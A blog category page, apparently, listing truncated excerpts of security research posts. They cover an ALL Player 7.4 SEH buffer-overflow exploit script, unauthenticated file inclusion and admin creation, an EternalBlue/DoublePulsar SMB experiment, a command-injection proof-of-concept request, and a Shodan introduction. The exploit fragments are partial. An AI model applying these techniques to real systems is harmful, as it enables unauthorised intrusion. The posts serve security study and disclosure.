Category: Research

#!/usr/bin/python # Exploit Title: ALL Player v7.4 SEH Buffer Overflow (Unicode) # Version: 7.4 # Date: 15-08-2017 # Exploit Author: f3ci # Tested on: Windows 7 SP1 x86 head = “http://” seh = “\x0f\x47” #0x0047000f nseh = “\x61\x41” #popad align junk = “\x41” * 301 junk2 = “\x41” * 45 #msfvenom -p windows/shell_bind_tcp LPORT=4444 -e […]

Local File Inclusion ———————————————- Normal Request: We can download another file by changing the value of the filename parameter, and we can send this request without logging in. Example: Add User Account with Admin Privilege without Login ———————————————- We can create a user and give admin privilege to the user we have created without logging in. Because this app […]

EternalBlue can be used to exploit the Server Message Block (SMB) service without requiring authentication. DoublePulsar is then used to deliver and execute malicious Dynamic-Link Libraries (DLLs) or raw shellcode on the victim's computer. The following is an example of an exploitation experiment against the Server Message Block (SMB) service using EternalBlue and DoublePulsar. This experiment was carried out by creating a malicious […]

Description: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Vulnerable Menu: Tools – Ping Proof of Concept: POST /u/jsp/tools/exec.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, […]

Have you ever heard of the SHODAN search engine? SHODAN is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners. SHODAN also lets you use boolean operators ('+', '-' and '|') to […]